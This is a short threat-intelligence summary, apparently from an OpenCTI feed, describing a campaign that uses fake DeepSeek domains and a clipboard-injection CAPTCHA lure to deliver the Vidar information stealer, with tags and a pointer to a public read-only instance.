DeepSeek Lure Used To Spread Malware

SUMMARY :

Cybercriminals are exploiting DeepSeek's popularity by creating fake look-alike domains to deliver the Vidar information stealer. The attack chain involves a deceptive website that prompts users to complete a fake partner registration, leading to a malicious CAPTCHA page. This page injects a PowerShell command into the user's clipboard, which when executed, downloads and launches the Vidar malware. Vidar targets cryptocurrency wallets, browser data, and sensitive files, using Telegram and Steam for C2 communication. The campaign highlights the rapid exploitation of AI technologies by threat actors and emphasizes the need for enhanced security measures and user education.

OPENCTI LABELS :

vidar,cryptocurrency,captcha,brand impersonation,deepseek,clipboard injection


Open in NetmanageIT OpenCTI Public Instance with below link!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


DeepSeek Lure Used To Spread Malware